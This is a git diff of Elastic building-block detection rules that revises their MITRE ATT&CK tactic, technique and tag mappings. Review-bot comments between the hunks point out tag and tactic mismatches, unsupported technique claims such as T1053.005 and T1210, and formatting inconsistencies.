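Review bot: The `tags = [` hunk for execution_settingcontent_ms_file_creation.toml drops `"Tactic: Defense Evasion"` and keeps only `"Tactic: Execution"`, but the threat hunk for the same file on the next line adds a second `[[rule.threat]]` entry whose `[rule.threat.tactic]` is TA0001 Initial Access (T1566.001), so the tags no longer mirror the tactics the rule declares; add `"Tactic: Initial Access",` beside `"Tactic: Execution",`. The same tag/threat mismatch appears in lateral_movement_at.toml, whose `tags = [` hunk removes `"Tactic: Execution"` while its threat hunk keeps the TA0002 Execution entry (T1053.002) next to the new TA0008 Lateral Movement entry, and in lateral_movement_wmic_remote.toml, whose `tags = [` hunk removes `"Tactic: Execution"` while the T1047 / TA0002 entry remains as context in its threat hunk. In all three files the `Tactic:` tag list should contain exactly one entry per `[rule.threat.tactic]` name.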
@@ -37,31 +46,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/execution_unsigned_service_executable.toml b/rules_building_block/execution_unsigned_service_executable.toml index ffcabcb5d95..3a861c4ab50 100644 --- a/rules_building_block/execution_unsigned_service_executable.toml +++ b/rules_building_block/execution_unsigned_service_executable.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] 
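Review bot: The added `[[rule.threat]]` block in execution_settingcontent_ms_file_creation.toml runs `framework`, `[[rule.threat.technique]]` and `[[rule.threat.technique.subtechnique]]` together with no separating blank line and then inserts three blank lines before `[rule.threat.tactic]`, while the removed lines show the file's existing convention of one blank line between tables. The same layout — no blank before the next table, two or three blanks before the tactic table, and an extra blank line appended at end of file (the trailing `+` before the next `diff --git`) — recurs in most threat hunks of this patch, which reads like the output of a TOML writer rather than an edit matched to the surrounding files. Normalizing to one blank line between tables and no trailing blank line would keep the rule files consistent and the diffs small.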
@@ -20,7 +20,15 @@ name = "Execution of an Unsigned Service" risk_score = 21 rule_id = "56fdfcf1-ca7c-4fd9-951d-e215ee26e404" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "new_terms" @@ -34,21 +42,39 @@ not process.code_signature.status : (errorCode_endpoint* or "errorChaining") [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" - [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "user.id"] diff --git a/rules_building_block/impact_github_pat_access_revoked.toml b/rules_building_block/impact_github_pat_access_revoked.toml index 3d5e9ef049b..f94c6f93197 100644 --- a/rules_building_block/impact_github_pat_access_revoked.toml +++ b/rules_building_block/impact_github_pat_access_revoked.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -33,3 +33,16 @@ configuration where event.dataset == "github.audit" and event.action == "persona ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml index f73cc4350e5..2e625988a7e 100644 --- a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml +++ b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] 
@@ -87,31 +87,31 @@ network where http.request.method == "POST" and http.response.status_code != 200 [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml index 51618b8cec8..b441c6147ea 100644 --- a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml +++ b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] 
@@ -17,7 +17,14 @@ name = "First Occurrence of IP Address For GitHub Personal Access Token (PAT)" risk_score = 21 rule_id = "fc909baa-fb34-4c46-9691-be276ef4234c" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Initial Access", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,39 +37,22 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.actor_ip"] diff --git a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml index 1479b9622dc..8f55ee6ca9d 100644 --- a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml 
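Review bot: The threat hunk for initial_access_github_new_ip_address_for_pat.toml deletes the T1550.001 Application Access Token / Defense Evasion entry together with the `"Tactic: Defense Evasion"` tag, leaving only T1078.004 Cloud Accounts, although the query context (`github.programmatic_access_type:("OAuth access token" or "Fine-grained personal …`) shows the rule is keyed on token use, which is exactly what T1550.001 describes. The same removal of T1550.001 is made in persistence_github_new_pat_for_user.toml further down, where it is replaced by T1098.001 Additional Cloud Credentials even though that rule, per its own context line, also triggers on token use rather than token creation. If the aim is to reduce each BBR rule to a single tactic, say so in the commit message; otherwise keep the Application Access Token entry in both files, since it is the technique that distinguishes PAT activity from an ordinary cloud-account logon.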
+++ b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -51,3 +51,27 @@ event.dataset:o365.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml index e0e39924ce2..168d55055ce 100644 --- a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] 
@@ -57,3 +57,24 @@ event.dataset:o365.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml index 25dca76688d..fc9e62e6053 100644 --- a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/08/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] 
@@ -73,7 +73,20 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Defender", "Data Source: Microsoft Defender for Office 365", "Data Source: Microsoft Threat Intelligence", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Defender", + "Data Source: Microsoft Defender for Office 365", + "Data Source: Microsoft Threat Intelligence", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -85,13 +98,26 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml index ab6d84d3a15..6126e019db1 100644 --- a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml 
+++ b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/04" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -55,3 +55,39 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules_building_block/initial_access_new_okta_authentication_behavior.toml b/rules_building_block/initial_access_new_okta_authentication_behavior.toml index c5fc2bc4b00..3333bc42b4d 100644 --- a/rules_building_block/initial_access_new_okta_authentication_behavior.toml +++ b/rules_building_block/initial_access_new_okta_authentication_behavior.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/08" [rule] author = ["Elastic"] 
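Review bot: The `@@ -55,3 +55,39 @@` hunk for initial_access_microsoft_purview_security_compliance_signal.toml attaches five tactic-only `[[rule.threat]]` entries (TA0001, TA0006, TA0009, TA0010, TA0040) to a single signal-forwarding rule, none of them with a `[[rule.threat.technique]]`. A rule that claims five tactics without any technique presumably shows up under all five in coverage views while adding no technique-level detection; if the forwarded alerts genuinely span those tactics it is likely more accurate to keep the file's original `initial_access_` tactic and describe the others in the rule description. If the five are kept, the file's `tags` (outside this hunk) need a matching `Tactic:` entry for each.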
@@ -76,17 +76,8 @@ event.dataset:okta.system and okta.debug_context.debug_data.risk_behaviors:* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml index cc03ed2a61a..38c577a2179 100644 --- a/rules_building_block/initial_access_okta_admin_console_login_failure.toml +++ b/rules_building_block/initial_access_okta_admin_console_login_failure.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/03" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -58,7 +58,16 @@ references = [ risk_score = 21 rule_id = "f960e8a4-31c1-4a6e-b172-8f5c8e5c8c2a" severity = "low" -tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide", "Rule Type: BBR"] +tags = [ + "Domain: Identity", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Data Source: Okta System Logs", + "Tactic: Initial Access", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" 
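Review bot: The hunk for initial_access_new_okta_authentication_behavior.toml removes the T1078 / T1078.004 technique block and leaves the ATT&CK entry with only `[rule.threat.tactic]` TA0001, so the rule no longer maps to any technique. Valid Accounts: Cloud Accounts is the technique that describes an authentication carrying Okta risk behaviors (`okta.debug_context.debug_data.risk_behaviors:*` in the hunk context), and nothing in the hunk explains the removal; it also looks like the mirror image of the change in initial_access_okta_admin_console_login_failure.toml on the next line, where the same T1078 block is added. If dropping it is intentional the commit message should give the reason; otherwise keep the removed `[[rule.threat.technique]]` block.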
@@ -72,13 +81,26 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules_building_block/lateral_movement_at.toml b/rules_building_block/lateral_movement_at.toml index 463fc4d11a7..ddedfe457c3 100644 --- a/rules_building_block/lateral_movement_at.toml +++ b/rules_building_block/lateral_movement_at.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,16 @@ name = "At.exe Command Lateral Movement" risk_score = 21 rule_id = "b483365c-98a8-40c0-92d8-0458ca25058a" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
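Review bot: The new first `[[rule.threat]]` entry in initial_access_okta_admin_console_login_failure.toml maps a login failure to T1078 Valid Accounts under Initial Access, but a failed admin-console login does not evidence use of a valid account; the T1110 Brute Force / Credential Access entry that stays as context is the observable the rule captures. Unless the query (outside this hunk) also matches successful logins, the added entry overstates coverage, and the `"Tactic: Initial Access"` tag added in the previous hunk would go with it. Consider keeping only the Credential Access mapping, or documenting in the description why Initial Access applies.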
@@ -37,31 +46,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml index aca164ce61f..444d49ece7f 100644 --- a/rules_building_block/lateral_movement_posh_winrm_activity.toml +++ b/rules_building_block/lateral_movement_posh_winrm_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
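Review bot: The threat hunk for lateral_movement_at.toml (rule "At.exe Command Lateral Movement") adds a `[[rule.threat.technique.subtechnique]]` for T1053.005 Scheduled Task next to the existing T1053.002 At subtechnique that stays as context, yet the rule's subject is at.exe and the visible query context (`process where host.os.type == "windows" and event.type == "start" and process.na…`) gives no sign it inspects schtasks.exe or the Task Scheduler API, which is what T1053.005 covers. Adding it inflates coverage with no detection behind it; drop the added `id = "T1053.005"` block unless the query (outside this hunk) was widened as well. The rest of the hunk only reorders the Lateral Movement entry ahead of Execution, which changes nothing semantically.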
@@ -83,36 +83,36 @@ case_insensitive = true value = "?:\\\\ExchangeServer\\\\bin*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.006" +name = "Windows Remote Management" +reference = "https://attack.mitre.org/techniques/T1021/006/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.006" -name = "Windows Remote Management" -reference = "https://attack.mitre.org/techniques/T1021/006/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml index 79380de7439..dbc9fce692a 100644 --- a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml +++ b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
@@ -24,7 +24,15 @@ references = [ risk_score = 21 rule_id = "e74d645b-fec6-431e-bf93-ca64a538e0de" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -70,31 +78,31 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" - [[rule.threat.technique.subtechnique]] id = "T1505.001" name = "SQL Stored Procedures" reference = "https://attack.mitre.org/techniques/T1505/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml index 79969f690ec..75ac81fc7f1 100644 --- a/rules_building_block/lateral_movement_wmic_remote.toml +++ b/rules_building_block/lateral_movement_wmic_remote.toml 
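Review bot: The threat hunk for lateral_movement_unusual_process_sql_accounts.toml replaces T1059 Command and Scripting Interpreter / Execution with T1210 Exploitation of Remote Services / Lateral Movement, but the query context (`process where event.type == "start" and host.os.type == "windows"`) observes a process start under a SQL service account, not exploitation of a remote service. T1210 implies a vulnerability being exploited, which a process-start rule cannot evidence, whereas an unusual child process of a SQL account is precisely the execution observable the removed T1059 mapping described, and the retained T1505.001 SQL Stored Procedures entry already carries the server-side context. If the intent is to file the rule under Lateral Movement to match its `lateral_movement_` name, T1021 Remote Services is the nearer technique; otherwise restore `id = "T1059"` with `id = "TA0002"` and the matching `"Tactic: Execution"` tag in the preceding hunk.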
@@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,17 @@ name = "WMIC Remote Command" risk_score = 21 rule_id = "f59668de-caa0-4b84-94c1-3a1549e1e798" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
@@ -41,31 +51,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.006" +name = "Windows Remote Management" +reference = "https://attack.mitre.org/techniques/T1021/006/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml index eed1c2780d2..f4aaaef461d 100644 --- a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml +++ b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
